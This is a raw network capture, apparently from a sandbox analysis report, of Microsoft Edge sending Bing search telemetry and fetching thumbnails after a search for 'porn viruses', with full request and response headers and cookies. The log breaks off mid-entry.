https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335538%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335689%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335923%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144336154%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336331%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336378%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22AsResponseLength%22%3A%22513%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144336521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%2Cig%3AAD769DB1D1C54297B43D5836059655BA%22%2C%22AnswerInfo%22%3A%22AS%3B23%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144336521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336897%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336941%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335538%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335689%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335923%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144336154%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336331%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336378%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22AsResponseLength%22%3A%22513%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144336521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%2Cig%3AAD769DB1D1C54297B43D5836059655BA%22%2C%22AnswerInfo%22%3A%22AS%3B23%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144336521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336897%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336941%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144337.184ea9de
GET

https://www.bing.com/th?id=OSK.35f285fec4c025cd6d429d20ac232906&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.35f285fec4c025cd6d429d20ac232906&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 6591
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144337.184eb3ee
GET

https://www.bing.com/th?id=OSK.386baad53bb81bdd42db8e4da40ae6e9&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.386baad53bb81bdd42db8e4da40ae6e9&w=120&h=120&c=6&p=0&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 5130
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144338.184eb5f7
GET

https://www.bing.com/th?id=OSK.f921ea0403325e186ba0da1699fdd1ef&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.f921ea0403325e186ba0da1699fdd1ef&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 3625
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144338.184eb76b
GET

https://www.bing.com/th?id=OSK.cjMdjXLY8eGBRLiEp8zRUkFGW1OVS7uL4pPWDtArqTk&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.cjMdjXLY8eGBRLiEp8zRUkFGW1OVS7uL4pPWDtArqTk&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 5070
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144340.184eb88c
GET

https://www.bing.com/th?id=OIP.vZk9avfjlOx4vsHNEfwe1QHaHY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OIP.vZk9avfjlOx4vsHNEfwe1QHaHY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; 